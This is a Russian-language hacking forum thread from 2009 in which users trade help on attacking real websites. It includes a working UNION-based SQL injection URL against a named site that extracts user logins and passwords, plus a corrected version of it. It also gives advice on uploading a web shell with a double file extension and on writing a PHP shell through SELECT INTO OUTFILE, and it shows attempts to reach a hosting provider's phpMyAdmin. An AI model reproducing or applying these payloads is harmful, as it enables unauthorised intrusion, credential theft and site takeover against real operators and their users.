 |
|
09.05.2009, 21:36
|
|
Познающий
Регистрация: 21.12.2008
Сообщений: 93
С нами:
9152066
Репутация:
39
|
|
только не тестовому
|
|
|
09.05.2009, 22:07
|
|
Познающий
Регистрация: 26.04.2008
Сообщений: 31
С нами:
9495721
Репутация:
53
|
|
помогите разобраться, что делаю не так, почему не выводятся значения?
версия 5
таблица и колонки существуют
Код HTML:
ht*p://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,users_login,users_pas),4,5+from+sip_zoorinok.USERS+limit+1,1/*
|
|
|
|
09.05.2009, 22:13
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
http://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,cast(users_login +as+binary),cast(users_pas+as+binary)),4,5+from+si p_zoorinok.USERS+limit+1,1/*
|
|
|
|
09.05.2009, 23:00
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Всех с 9 Мая
Tакой вопрос , мознали как то на сайт закинут shell ( есть админка ) , тока вот format php нельзя .Можно Ли это как то обойти ?
|
|
|
|
09.05.2009, 23:05
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Попробуй двойное расширение типа shell.gif.php
Не опытные программисты часто допускуют такую ошибку, так как проверяют расширение идущее после первой точки.
|
|
|
|
09.05.2009, 23:16
|
|
Познающий
Регистрация: 07.05.2009
Сообщений: 64
С нами:
8953743
Репутация:
59
|
|
Сообщение от crazy~driver
подскажите
может кто-то сталкивался с хостингом mirohost
как мне пробраться к авторизации в phpmyadmin
Вот что у меня получилось выудить у службы поддержки:
phpmyadmin находится в панели управления, раздел управление mysql - mysql менеджер - список пользователей - phpmyadmin
То есть как мне показалось там нету полного интерфейса пхпмайадмина, но это косвенно...
Пока искал твой пхпмайадмин в гугле наткнулся на интересый поддомет этого хостинга:
Код:
http://mirror.mirohost.net/
Что я там обнаружил, от туда можно скачать phpmyadmin oO
Код:
http://mirror.mirohost.net/ubuntu/pool/universe/p/phpmyadmin/
А также различные конфиги похопе, но это если интересует...
|
|
|
|
09.05.2009, 23:29
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от InFlame
Как можно обойти фильтрацию скобок при sql-inj?
В зависимости от конкретной ситуации и конкретного примера...
|
|
|
|
09.05.2009, 23:35
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
С праздником!
Такой вопрос:
есть phpmyadmin от юзера root@localhost со всеми привелегиями...при запросе типа
select '<? phpinfo(); ?>' into outfile '/patch_to_public_html/shell.php'
выдает "#1 - Can't create/write to file '.../shell.php' (Errcode: 13)"
В корень, в папки usr,var - та же ошибка... почему это у рута не хватает прав на создание файла Оо ?
|
|
|
|
09.05.2009, 23:43
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
так root то mysql ный а не системный!
|
|
|
|
09.05.2009, 23:48
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.
DeepXhadow, root в mysql не является рутом в системе. У тебя права скорее всего просто mysql. Ищи на сайте диры с правами на запись для всех.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
